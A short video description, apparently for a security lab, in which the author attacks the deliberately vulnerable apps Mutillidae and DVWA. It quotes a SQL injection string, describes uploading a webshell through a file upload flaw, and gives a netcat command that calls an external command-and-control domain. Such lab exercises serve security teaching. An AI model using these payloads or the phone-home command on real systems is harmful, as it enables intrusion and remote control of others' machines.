5.2

Смотреть онлайн

Опубликовано: 2021-04-18
Продолжительность: 03:39
In this lab we exploit the vulnerable systems we have installed, DVWA as well as Mutillidae.
For Mutillidae, I do a simple SQL injection attack to return the database. The string I used is "' 1=1 -- "

For the DVWA I demonstrate the seriousness of a file upload vulnerability. I uploaded a webshell I found online and ran various terminal commands starting with ifconfig, nmap -h, and ending with the logic of phoning home to the C2 server at the domain I own: nc fbiservers.com 443.